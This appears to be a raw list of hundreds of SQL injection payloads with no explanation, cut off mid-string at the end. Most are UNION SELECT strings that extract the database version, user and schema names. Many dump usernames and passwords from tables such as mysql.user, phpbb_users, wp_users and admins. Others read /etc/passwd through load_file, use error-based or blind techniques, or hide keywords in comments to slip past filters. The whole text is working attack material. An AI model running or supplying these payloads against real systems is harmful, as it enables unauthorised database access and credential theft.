null,999999999999,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71)/* -1 union select null,char(60,104,49,62,71,111,117,100,105,110,105,32,239,238,231,228,240,224,226,235,255,229,242,32,226,241,229,245,32,224,247,224,242,238,226,246,229,226,32,241,32,205,195,60,47,104,49,62),null,null,null,null,null,null from users/* -1 UNION SELECT null,concat(login,':',pass),null,null From users limit 0,1/* -1 union select null,concat_ws(char(58),user,pass,name),null from users/* -1 union select null,concat_ws(version(),user(),database()),3-- 1 union select null,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from Accounts-- -1 union select null,mysql.user.password,null,null from mysql.user 1) UNION SELECT null,null,cast(user as text),null,null,null,null,null,null,null,null,null,null,null,null,null-- -1 UNION SELECT null,null,concat(email,char(58),ip),null,null,null,null,null,null from emails/* -1 union select null,null,concat(user,0x203a20,password),null from mysql.user/* 1 union select null,null,null,concat_ws(0x20,user(),database(),version()),null/* -1 union select null,null,null,null,concat_ws(char(58),username,password,email),null,null,null,null,null,null,null,null,null from phorum_users/* -1 union select null,null,null,null,null,null,null,null,111,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from MSysAccessObjects -1 union select null,null,null,null,null,null,null,null,null,_nickname,null,_pass,null,_pass2,null from web_clients limit 1 offset 51 -1 union select null,null,null,null,null,null,null,null,null,null,123,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from races -1 union select null,null,null,null,null,null,null,null,null,null,CONVERT(concat_ws(0x3a,user(),Version(),database()),binary),12,13,14,111111111,16,17,18,19,20,21,22,23,24,25,26 -- 1 unIon SelEcT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,current_database()||chr(58)||version()||chr(58)||current_user,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null-- -1 union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename from pg_user where usename=user and usesuper=$$true$$-- -1 union select null,null,null,username,null,null,null,null,null,null,null,null,null,null from users where 1=1/* -1 UNION SELECT null,null,version(),null,null,null,null,null,null,null,null,null -1 union select null,TABLE_NAME from INFORMATION_SCHEMA.TABLES-- -1 UNION SELECT null,to_char(111),to_char(222),to_char(333),to_char(444) FROM ARTICLEINFO -1 union select null,user(),null/* -1' union select null,user(),null,null,null,null,null,null,null,null/* -1 union select null,version(),null,null -- -1 union select null,version(),null,null,null,null-- -1 union select password,2,user,4,5,6,7,8,9,10 from mysql.user/* -1' union select password from mysql.user/* 1' union select password from users/* -1 union select (proxywork($$func$$)::text) from pg_user LIMIT 1 OFFSET 0-- 1 union select pwd from admins limit 7,1/* 1' union select (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),2 -- -1' union select substring(group_concat(table_name),250),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables -- 1 union select table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables -1 union select table_name,2,3,4 from INFORMATION_SCHEMA.TABLES limit 16,1/* -1 union select table_name,2,3 from information_schema.tables -1 union select table_name,2 from INFORMATION_SCHEMA.TABLES limit 37,1/* -1 union select table_name from information_schema.columns where column_name=0x70617373776f7264/* -1 union select table_name from information_schema.tables-- -1 union select table_name from INFORMATION_SCHEMA.TABLES limit 0,1/* -1' union select table_name from information_schema.tables limit 59,1/* -1 union select table_name from information_schema.tables limit 73,100 -- -1 union select table_name,table_schema,user(),version(),0xa920564954414c from information_schema.tables/* 1' union select top 1 convert(int,password) FROM EMAGIC_LOGINS where username='sa'-- -1 union select top 1 username char(0x7e) password,222,333 from Operators-- 1 union select unhex(hex(concat(table_name))),database(),version(),user() from information_schema.tables-- -1 union select unhex(hex(concat_ws(0x3a3a,0x3a3a,version(),0x3a3a))),2,3,4,5,6,7,8,9,10,11,12/* -1' union select unhex(hex(concat_ws(0x3a,table_name,table_schema,version()))) from information_schema.tables/* -1 union select unhex(hex(concat_ws(0x3a,username,passwd))),2,3 from admin-- -1 union select unhex(hex(concat_ws(0x3a,user,password))) from mysql.user-- -1 union select unhex(hex(concat_ws(0x3a,user(),version(),database())))-- -1 union select unhex(hex(concat_ws(0x3a,user(),version(),database()))),2,3,4,5,6,7,8,9,10,11,12-- 1 union select unhex(hex(TABLE_NAME)) from information_schema.tables /* 1' union select unhex(hex(version()))/* -1 union select unhex(hex(version())),2,3,4,5,6,7,8,9,10,11,12-- -1 union select user()-- -1' union select user()/* -1 union select user(),2,3 /* -1 union select user(),2,3,version(),5,6,7,8,9,10,11,12,database(),14,15,16,17,18,19,20-- -1 union select user,2,password from mysql.user/* -1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users-- -1 union select user(),concat_ws(0x3a,username,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15 from mos_users-- -1' UNION SELECT USER(),DATABASE(),VERSION()/* -1 union select user(),database(),version(),4 -1 union select user(),database(),version(),4/* -1 union select user,file_priv from mysql.user /* 1 union select user_login from wp_users/* -1 union select username,2 from phpbb_users/* -1 union select user,password,5,6,7,8,9 from mysql.user/* 1' union select user_password from phpbb_users where user_id='3 -1 union select user,password from user limit 0,1/* -1 union select user(),version(),3,4,5,6,7,8/* -1 union select user(),version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -1' UNION SELECT USER(),VERSION(),3,DATABASE(),5,6,7,8,9,10,11,12,13,14,15,16,table_name,18,19,20,21 FROM information_schema.tables/* -1 union select @@version -- -1 union select version() -- -1 union/**/select version()/* -1' union select @@version-- -1' union select version() -- -1) union select version()-- 1)) union select version()# 1 union select VERSION() -1 union select version(),2 -- -1' union select @@version,2-- -1 union select @@version,2,3 -1 UNION SELECT version(),2,3 -1 union select @@version,2,3,4-- -1 union select version(),2,3,4,5-- -1 union select version(),2,3,4,5,6,7,8/* 1 ' UNION SELECT version(),2,3,4,5,6,7,8,9 -- -1 union select version(),2,3,4,5,6,7,8,9,10,11,12,13/* -1 union select VERSION(),2,3,4,5,USER(),7,8,9,10 from users/* -1 UNION SELECT VERSION(),2,3,4,5,USER(),DATABASE(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54-- -1 union select version(),2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14 from mysql.user/* 1 union select version(),2 order by 1 -1 union select version(),concat_ws(0x0a,login,passwd),3,4,user(),6,7,8 from users limit 0,1/* -1 union select version(),database(),3,user(),5/* -1 union select version(),user(),database(),@@version_compile_os/* -1 union select VERSION(),USER(),null/* -2000016219 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 -- -20000710 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5-- 20000 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5 20000 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64/* 2000 union select 1,version(),3,4 from users/* 2001' and (select 1 from (select count(0),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- 2001' and (select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- -2001 union select 1,2,3,table_name,column_name,6,7,8,9,0,1,2,3,4,5,6 from information_schema.columns/* 2001 union select 1,2,concat(user,0x3a,password,0x3a,host),4 from mysql.user-- 2001 union select 1,2,concat_ws(0x3a,login,pass),4 from users -- -20026 UNION SELECT 1,2,3,4,5,6,7,password,9,10,11,12,13 FROM users-- -2003 union select 1,2,user,4,5,6,7,8 from users/* -2003 union select u.* from users u/* 2004049 and 1=0 union select 1,2,3,4,5,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),7,8,9,0,1,2,3,4-- -2004 union select 1,2,3,4,5,6,7,group_concat(table_name separator 0x3a) from information_schema.tables where table_schema=0x64625f313539 -- 2004' union SELECT 1,TABLE_NAME,1 FROM INFORM ATION_SCHEMA.TABLES-- 2005131577-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 2005 and 1=0 =null Union Select null,null,concat(0x494E43,@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os),null,null,null-- -2005) union select aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71) from mysql.user/* -20060721 UnIon selECt 1,2,3,4,table_name,6,7,8,9 from information_schema.tables-- -20060728 and (select*from(select count(*)from(select 1 union select 2 union select 3)y group by concat(mid((select concat_ws(0x3a,version(),database(),user()) from INFORMATION_SCHEMA.TABLES limit 0,1),1,65),floor(rand(0)*2)))y)-- 20060912163908 union select concat(0x3,version(),user(),database()),2,3,4 -200610131900802 UNION SELECT 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14/* -2006101 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11/* 2006' union select 1,concat_ws(char(58),version(),database(),user()),3,4 from news -- -2006 union select 1,unhex(hex(concat_ws(0x3a,user(),version(),database()))),3,4,5/* -20070630 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,table_schema,table_name,column_name),0x55),0x55),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 from information_schema.columns/* -20071110' union select 1,2,3,4,5,convert(version() using latin1),7,8,9,10,11,12,13,14/* -2007 union select 1,2,3,4,5,6,7,8 from user-- 2007 union select 1,2,3,4,5,password,7,8,login,concat_ws(0x3a,user(),version(),database()),11,12 from users-- -2008080803' union select 1,2,3,concat(version(),0x3a3a,database(),0x3a3a,user(),0x33aa,@@version_compile_os),5,6,7,8,9-- -20081018135956 union select concat_ws(0x3a,database(),version(),user()),2,3-- 2008-11' union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8/* 2008 and 1=2 union select 1,2,3,concat_ws(0x3a,username,password),5,6,7 from login-- 2008 and 1=cast((SELECT version()||chr(58)||current_user||chr(58)||current_database()) as int)-- -2008 union select 1,2,3,4,5,concat_ws(0x3a3a,username,password,level),7,8,9,10,11,12,13,14 from admin /* 2009/02/26/16/99999 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15-- -20091105163054 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4,5,6,7,8,9,10,11-- 20094 union select 1,version(),3,4,5,6 -- - 20096 union select 1,2/* 2009 union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,@@version,28 from information_schema.tables-- 2009' union select 1,2 /* -2009 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -2009 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 -- 2009 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.columns where column_name like 0x257061737325-- -2009' union select concat_ws(0x3A,version(),user(),database()),2,3 -- 200 and 0 UNION SELECT 1,2,3,4-- -200 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -200 union select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17/* 2010010522363609 and 1=0 union select 0,1,2,3,4,5,6,7,8,9,10,11,12-- -20100301172740 union select 1,2,version(),4,5,6,7,8,9,10,11-- 20100708151618 union select 1,2,3,4,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),6,7,8,9 -- 2010091 OR 1=(select @@version) 20100 union select 1,2,3,4,5,concat(user(),0x2f,database(),0x2f,version()),7,8,9,10-- -2010-1-24' union select 1,concat_ws(0x3a3a,user_id,username,password,enpassword,ip,lastlogin,lastlogout,privilege),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from cwa_user -- -2010 and 1=2 union select 1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15 -- 20110101 union select 1,2,3,concat_ws(char(58),version(),user(),database(),@@version_compile_os),5,6,7 -- 2011-4' union select 1,2,concat('User:',user(),'
Version:',version(),'
Database:',database()),4,NULL,6,7,8,9 /* -20142 union select 1,2,3,table_name,5 from information_schema.tables/* -20182 union select 1,2,concat_ws(0x3a,admin_username,admin_pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admins-- -20193' union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14 from information_schema.tables -- -2019 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x3a,user(),version(),database()),24,25,26,27,28-- -2019 UNION SELECT 1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6,7,8,9,10,11,12,13,14,15/* 201 and 1=0 Union Select CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2 -201 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version()-- -201 union select 1,2,3,4,version(),6 -- -201 union select 1,2,username,4,user_password,6,7,8,9,10,11 from phpbb_users limit 1,1/* -201 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT CONCAT(USERID,0x3a,USERNAME,0x3a,PASSWORD,0x3a,TYPE,0x3a,EMAIL) FROM osi.USERS LIMIT 4,1),0x3a),0x71),0x71)-- -201 union select unhex(hex(concat_ws(0x3a3a,id_danhmuc,username,password,level))),2,3,4,5,6 from gws_admin -- -201 union select version(),2,3,4,5-- 20200 union select 1,2,3,4,5,6,7,8 limit 1,1/* -20210054 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12-- -20223 union select 1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14,15,16 -2022 union select 1,concat_ws(0x3a,user(),version()),3,4,5,6,7,8,9,10,11-- 20238888 union select concat(username,char(58),password),2,3,4,5 from users/* 20282 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4/* 202-999.9 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 -- -2029 union select 1,2,3,4,version(),6,7,8,9,10-- 202 and 1=0 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9-- -202 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123 -202 union select 1,concat(username,0x3a,password) from user/* 20353 and 1=0 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5 -203 and 1=2 union select 1,2,3,4,5,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16 -- -203 union select 1,2,3,4,5,concat_ws(0x3a3a,user_name,user_password),7 from users -- -203 union select 1,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os)-- -2041 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from users-- 2042 union select 1,2,3,concat_ws(0x2020,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 -2043 union select 1,database(),3,4,user(),6,7/* -2044 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(Username,0x3a,Password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from users -- -2044 union select 1,2,3,4,5,6,7,8,9,10,11,12,SQL,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -2045 union select 1,2,concat(login,char(58),pass,char(58),email),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,load_file(0x2f6574632f706173737764),27,28,29,30,31,32,33,34 from users/* -2046 union select 1,aes_decrypt(aes_encrypt(group_concat(user,char(58),password),1),1),3,4 from mysql.user-- -20476/**/union/**/select/**/concat(user,0x3a,password)/**/from mysql.user/* 204.9' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19,20,21,22,23,24,25,26,27,28 and 'x'='x -204 union select 1,2,3,4,5,version(),7/* -204 union select 1,2,3,group_concat(email),5,6,7,8,9,10,11,12,13,14 from tdevils_db.staff-- -204 union select 1,2,concat_ws(char(58),version(),database(),user()),4,5,6,7,8 -- -204' union select 1,2,version(),4,5,6,7,8,9,10 -204 union select concat(table_name,0x3a3a3a),2,3,4 from information_schema.tables limit 0,1/* -2054 union select 1,Concat_ws(char(58),last,first,otch,birthday,educ,inst,spec,work,post,region,raion,town,street,dom,kv,hphone,wphone,mphone,ser,num,kem,kogda),3,4,5 from smrucom_smru.enter limit 1 offset 0/* -2057 ' AND 1=0 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5 -- -2058 union select 1,2,3,concat_ws(0x3a,name,email,password),5,6,7,8,9,10,11,12,13,14 from users -- -205 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -205' union select 1,2,3,concat_ws(0x3a,id,user,pass),5,6,7,8,9,10,11,12,13,14 from usuarios -- -205' union select 1,2,group_concat(table_name),4,5 from information_schema.tables /* 20630' union select 1,2,3,4,5,6,71,8,9,0,1,2,3,4,5,6,72,8,9,0,1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,0,1,2,3,4,5,6,7,8,9/* -2065 union select concat_ws(0x3a,user_id,username,user_password,user_level) from phpbb_users where user_level=1 limit 0,1/* 206875871 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52-- 206 and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database()) -2071' union select 1,2,unhex(hex(concat_ws(0x3a3a,user_email,user_id,user_password))),4,5,6,7,8,9,10,11,12,13 from phpbb_users limit 2,1 -- -20741 union select null,null,to_char(user) from sys.dual-- 20766 union select 1,2,3,concat(a_name,0x3a,a_passwd),5 from admins/* -20768 union select 1,2,3,4,5,cast(concat(login,0x3a,password) as binary),7,8,9,10 from users/* -207 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,database(),version(),user(),@@version_compile_os),26,27,28,29,30-- -207' UNION SELECT 0,1,2,concat_ws(0x0b,user(),version(),database()),4,5 -- -207 union select 1,2,3,4,5,6,7,8,group_concat(concat(table_name,0x3a,table_rows)separator 0x3c62723e),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,4 from information_schema.tables-- -207 UNION SELECT 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 -- 207 union select 1,2,3,version(),user(),database(),7,8,9,10,11,12,13,14-- -207 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -207 union select 1,concat(@i:=0x00,@o:=0x0d0a,benchmark(23,@o:=CONCAT(@o,0x0d0a,(SELECT concat(table_schema,0x2E,@i:=table_name) from information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),3,4,5-- -207 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11-- -208 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26-- -208 union select 1,2,3,4,5,6,7,8,9 from information_schema.tables -- -208 union select 1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8 from users/* -208 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0-- 208) union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9 -- 208 union select 1,concat_ws(0x3a3a,id_administrator,login,password,status) from administrator -- 2091 union select null,version(),null,null,null,null,null,null-- 2097 union select 1,2,concat_ws(0x2a2a2a,username,password,email),4,5,6,7,concat_ws(0x2a2a2a,version(),user(),database()) from mos_users -- -20982 union select 1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12 from personal limit 0,1-- 20999 union select aes_decrypt(aes_encrypt(version(),0x71),0x71),2,aes_decrypt(aes_encrypt(user(),0x71),0x71),aes_decrypt(aes_encrypt(database(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17/* 209 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20/* -209' union select 1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from mysql.user/* -209' union select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13-- -209' union select 1,GROUP_CONCAT(COLUMN_NAME SEPARATOR 0x3a),3,4,5,6,7,8,9,10,11,12,13 FROM information_schema.COLUMNS WHERE TABLE_NAME='admin'-- -209' union select 1,GROUP_CONCAT(TABLE_NAMESEPARATOR0x3a),3,4,5,6,7,8,9,10,11,12,13 from information_schema.TABLES WHERE TABLE_SCHEMA='azlk'-- 20 and 0=1 union select 0,group_concat(user_username,0x3a,user_password),2 from wma_users-- 20 aNd 1=0 /*!UNION*/ SELECT 1,2,3,4,version() -- 20 and 1=0 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5-- 20 and 1=0 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- 20 and 1=0 union select 1,pwd,3,4,5,6,7,8 from users -- -20 and 1=2 union select 1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5 -- 20 AND ASCII(SUBSTRING((select version()),1,1))>x-- 20 AND ASCII(SUBSTRING((select y()),1,1))>x-- 20'and(substring(version(),1,1))=4-- 20 limit 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 20 limit 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3A,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19 from information_schema.columns/* 20 limit 0 union select 1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,TABLE_SCHEMA,15,16,17,18,19 from information_schema.columns/* 20 or(1,2)=(select count(*),concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_compile_os,floor(rand(0)*2))from(information_schema.tables) group by 2) -20 union all select 1,2,load_file('/etc/passwd'),user(),version(),6,7,concat(user,0x3a,password),9,10 from mysql.user-- -20 union all select load_file('/etc/passwd'),2,3,4,5,6,7-- -20 union select 1,2,^ -20 union select 1,2,3,4,5,6,7,8,9-- -20 union select 1,2,3,4,5,6,7,8,9,concat(login,char(58),password),11,12,13,14,15,16,17,18,19,20 from users 20 union select 1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9,10,11,12,13-- -20 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()) -- -20 union select 1,2,3,4,5,6,concat_ws(0x3b,database(),version(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 -- 20 UNION SELECT 1,2,3,4,5,6 LIMIT 1,1 -20 UnIon selECt 1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20 -- -20 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x3a,User(),Version(),Database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -20 UnIon selECt 1,2,3,4,5,version(),7,8 -- -20 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -20 union select 1,2,3,4,5,version(),7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65/* 20 union select 1,2,3,4,concat_ws(0x3a3a,idusuario,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from modelo_usuario -- -20' union select 1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11 from 10ch.users -- -20 union select 1,2,3,4,concat_ws(0x3a,uname,pass,rank),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from susuibu_xoop1.xoops_users-- -20' union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* -20 union select 1,2,3,4,concat_Ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9-- -20 union select 1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8,9,10,11/* 20 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -20 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 20 union select 1,2,3,concat(version(),0x3a,user(),0x3a,database())/* 20' union select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7/* -20 union select 1,2,3,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3-- -20 union select 1,2,3,concat_ws(0x3a3a,id_auth_user,login,pwd,email,name),5 from ea_auth_user -- -20 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8-- -20 union select 1,2,3,concat_ws(0x40,table_schema,table_name),5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables/* -20 union select 1,2,3,CONVErT(version() using latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -20 union select 1,2,3 from admin /* -20 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5 -- -20 UnIon selECt 1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -20 union select 1,2,3,user(),5,version(),database(),8,9,10,11,12,13,14,15,16/* -20 union select 1,2,3,user,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from mysql.user /* -20 union select 1,2,3,user,password,6,7,8 from mysql.user limit 0,1/* -20 union select 1,2,3,version(),database(),6,7,8,9,user(),11,12,13,14-- 20 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5-- -20 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4,5,6,7-- -20 union select 1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11 from mysql.user/* 20 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),table_name,5 from information_schema.tables limit 40,100-- -20 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6 -20 union select 1,2,concat_ws(0x3b20,user(),database(),version()),4,5,6/* -20 union select 1,2,'../../../../../etc/passwd'-- -20 UnIon selECt 1,2,radio_account_login,4,5,radio_account_password,7,8,9,10,11,12,13,14,15,16,17,18,19 from radio_account limit 0,1 -- -20 union select 1,2,user(),version(),5,6/* 20 union select 1,2,version(),4,version() limit 1,1-- -20 union select 1,cast(version() as binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -20 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5/* -20 union select 1,concat_ws(0x0b,version(),user(),database()),3,4,5,6,7 -- -20 union select 1,concat_ws(0x2F,version(),user()),concat_ws(0x2F,login,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admins/* -20 union 